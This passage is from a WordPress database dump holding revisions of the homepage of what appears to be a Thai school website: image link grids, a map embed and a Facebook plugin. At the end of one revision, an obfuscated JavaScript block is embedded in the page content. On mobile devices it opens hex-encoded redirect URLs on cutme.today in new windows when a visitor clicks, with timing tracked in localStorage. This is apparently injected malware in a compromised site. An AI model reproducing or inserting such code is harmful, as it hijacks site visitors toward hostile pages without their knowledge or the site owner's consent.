href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=484\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-04 14:25:30','2025-07-04 07:25:30','',14,'http://pakhaeng.ssk.in.th/?p=1686',0,'revision','',0),
(1688,1,'2025-07-04 14:32:53','2025-07-04 07:32:53','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image 